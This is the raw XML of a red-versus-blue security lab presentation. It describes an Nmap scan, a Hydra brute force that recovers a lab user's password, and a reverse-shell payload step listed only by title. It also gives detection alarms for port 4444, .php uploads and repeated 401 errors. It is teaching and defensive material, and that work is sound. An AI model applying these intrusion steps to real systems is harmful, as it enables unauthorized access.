            </a:endParaRP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>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Remove Hidden Folder from Web Server altogether.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p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5169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308B84-A12D-5AA3-E984-26FBF0894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433" y="1271685"/>
            <a:ext cx="2871095" cy="2156621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US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Mitigation: Brute Force Attacks &amp;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Reverse Shell Uploads </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="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36D10-4EE9-18DB-A6F5-DDFA6C00FE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66321" y="1272886"/>
            <a:ext cx="6916400" cy="20487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Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>An alarm that detects the number of requests per second. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The alert should be triggered when multiple 401 error codes occurs after 5 login attempts within a second.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Mitigation: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Require two factor authentication and/or </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Implement an account lockout policy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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033D14-D7ED-D990-2BDA-01B237BE9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31329" y="4576826"/>
            <a:ext cx="6916400" cy="21534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Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Set an alarm that detects when port 4444 is used.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Set another alarm to alert when a user attempts to or successfully uploads a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mitigation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Restrict the ability to upload files to the WebDAV folder/server to authorized users. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs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05309E-199F-2967-A8C4-504962448BA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862621" y="206277"/>
            <a:ext cx="7020868" cy="977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325C03-ED90-49D5-8D57-94CEC5334853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5033854" y="325158"/>
            <a:ext cx="6683495" cy="7387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What kind of alarm can be set in order to detect brute force behavior and at what threshold?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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33D86B-7297-93CB-584E-811B4C383C1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4862620" y="3550933"/>
            <a:ext cx="7020868" cy="977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649F6C-E678-2C47-F2A2-B8E885E703D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5033853" y="3669813"/>
            <a:ext cx="6683495" cy="7387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What kind of alarm can be set in place in order to detect reverse shell uploads?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275175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308B84-A12D-5AA3-E984-26FBF0894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433" y="1271685"/>
            <a:ext cx="2871095" cy="2156621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US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Mitigation: Offensive Traffic &amp; WebDav Connections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36D10-4EE9-18DB-A6F5-DDFA6C00FE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5620" y="2650506"/>
            <a:ext cx="6666277" cy="247039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>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>An alert can be set to detect when machines outside the whitelist are trying to access the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:cs typeface="Calibri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>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Mitigation: Create a whitelist of specific IP and Mac addresses can help restrict access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"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033D14-D7ED-D990-2BDA-01B237BE9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2926080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403CBD-D00D-D827-DEF1-92EDE06388C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4804452" y="921742"/>
            <a:ext cx="7020868" cy="977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5FAC87-A6F8-8C28-FB1E-0AA7A0E2BDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4977831" y="1040623"/>
            <a:ext cx="6683495" cy="7387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What kind of alarm can be set in order to detect a potential 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WebDav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 connection?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52816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BF02D-0711-5C8D-2944-B79270FE4C7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Network Topology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 3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C7FA4A96-97E8-B497-5E0F-5AAF923E5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392" y="1966293"/>
            <a:ext cx="7845215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995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3D708-A7C5-6B68-83B0-A632A2B51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34946"/>
            <a:ext cx="3689094" cy="5055904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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>RED TEAM OBJECTIVES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Avenir Next LT Pro Light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40A38FD-5791-03A6-82B3-B928C546EA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958894"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4960791" y="337767"/>
          <a:ext cx="6795915" cy="56018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6032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1D6BE-A83E-405F-0EC4-70E92AA17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Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro" panose="020B0504020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SCAN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33F1C21C-F2B4-BFF4-F18A-5800C2947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0" tIns="45720" rIns="0" bIns="45720" rtlCol="0" anchor="t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>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use Nmap to scan for the IP range of 192.168.1.1/24 to ascertain the IP address of the Linux web server.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>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The scan revealed that 192.168.1.105 is the only server with port 80 open to accept web traffic.  We know this is the web server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 23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CA72A397-DCA3-8CD2-8E6E-DA87FDEB7E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8" r="-101" b="120"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5405862" y="874318"/>
            <a:ext cx="6019331" cy="510611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87694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0D339-B897-1CB8-25E3-9782ADC9A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  <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>OPENING THE BROWSER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048E00A-2B22-3D20-12DD-4F701614C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745" y="2799654"/>
            <a:ext cx="3645308" cy="3189665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20F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>To access the web server, we entered the following URL in the web browser:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>http://192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This revealed that the company's parent directory is accessible from the internet. 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D67D0BB-A264-68CB-6038-DC43C032C7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80" r="8161" b="12916"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4602627" y="823185"/>
            <a:ext cx="6799050" cy="41338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5303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0734EE-6A66-935B-E79B-47E75C47A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75488"/>
            <a:ext cx="10515600" cy="1197864"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>Finding the Secret Folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:latin typeface="Avenir Next LT Pro Light"/>
              <a:cs typeface="Calibri Light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5488" y="585216"/>
            <a:ext cx="0" cy="9144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3" descr="Graphical user interface, application, email&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4661AC9-8429-00B0-E96C-71E03D5D6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104" y="2602840"/>
            <a:ext cx="6217920" cy="2969055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F1B2372-5140-9B61-0FEE-C4D31651B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6" y="2002536"/>
            <a:ext cx="3822192" cy="4169664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>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>We examined the contents of the directory and learned that there are three team members </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Avenir Next LT Pro Light"/>
              <a:cs typeface="Calibri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>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>Additionally, the text files in the directory state that the documents have been moved to a secret folder located in the company folders. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Avenir Next LT Pro Light"/>
              <a:cs typeface="Calibri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>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>This directory is password protected and the pop-up tells us the user is Ashton. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Avenir Next LT Pro Ligh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21748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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C956CA-A8FB-4F91-A258-FBE459CD9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Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8F813CC-2826-5D55-F9BE-5BDCF9AE58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7437" r="2" b="15351"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546558" y="2391337"/>
            <a:ext cx="6645441" cy="4466657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0A48D59-8581-41F7-B529-F4617FE07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6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1" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9407F9-CCFA-9B21-B4AE-E9D1CC800E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r="8987" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546558" y="-1"/>
            <a:ext cx="6645441" cy="23913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C533BB-9E27-6CF2-0BBB-1474B4A9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087" y="402431"/>
            <a:ext cx="4641631" cy="14664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kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>USING HYDRA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67F2066-0253-4771-A5F6-68111E1FE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87669" y="2397906"/>
            <a:ext cx="1100433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C007287-988E-E670-0F74-21C2A63E0EC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816193" y="3120730"/>
            <a:ext cx="4641631" cy="3015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28600" indent="-4572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800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>Using Hydra to brute force the login credentials for Ashton returns the password "leopoldo" giving us access to the secret_folder directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Avenir Next LT Pro Light"/>
              <a:cs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404476-4F3B-D646-CD22-01C286DA4985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866775" y="1943100"/>
            <a:ext cx="4676775" cy="914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6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2A018-ABB9-5B13-A19C-CC0B6EDFF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34946"/>
            <a:ext cx="3689094" cy="5055904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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>RED TEAM OBJECTIVES </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Avenir Next LT Pro Light"/>
              </a:rPr>
              <a:t>CONTINUED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E32E097E-84B9-8376-E834-CADB5199A8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3866709"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5021935" y="598224"/>
          <a:ext cx="6582555" cy="51217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5582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24</Slides>
  <Notes>1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Office Theme</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>RED VS BLUE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>RED TEAM OBJECTIVES</vt:lpstr>
      <vt:lpstr>NMAP SCAN</vt:lpstr>
      <vt:lpstr>OPENING THE BROWSER</vt:lpstr>
      <vt:lpstr>Finding the Secret Folder</vt:lpstr>
      <vt:lpstr>USING HYDRA</vt:lpstr>
      <vt:lpstr>RED TEAM OBJECTIVES  CONTINUED</vt:lpstr>
      <vt:lpstr>Access the Secret Folder Directory</vt:lpstr>
      <vt:lpstr>Access the Corporate Server</vt:lpstr>
      <vt:lpstr>Create the Custom Payload</vt:lpstr>
      <vt:lpstr>Set the Listener</vt:lpstr>
      <vt:lpstr>Open a Shell and Find the Flag</vt:lpstr>
      <vt:lpstr>BLUE TEAM OBJECTIVES</vt:lpstr>
      <vt:lpstr> Identify the Initial Offensive Traffic </vt:lpstr>
      <vt:lpstr>Find the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Identify the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Find the WebDav Connection</vt:lpstr>
      <vt:lpstr>Identify the Meterpreter Traffic</vt:lpstr>
      <vt:lpstr>Hardening: Alarms, Thresholds, &amp; Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory </vt:lpstr>
      <vt:lpstr>Mitigation: Brute Force Attacks &amp; Reverse Shell Uploads </vt:lpstr>
      <vt:lpstr>Mitigation: Offensive Traffic &amp; WebDav Connections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</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-06-12T02:33:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-20T23:44:32Z</dcterms:modified>
</cp:coreProperties>
</file>